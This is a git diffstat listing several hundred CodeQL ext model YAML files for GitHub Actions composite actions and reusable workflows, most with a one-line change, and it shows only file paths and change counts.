.../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- 
.../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- 
.../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- 
.../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- 
.../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- 
.../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- 
.../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml 
| 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- 
.../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 
2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 
+- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 
2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- 
.../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- 
.../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- 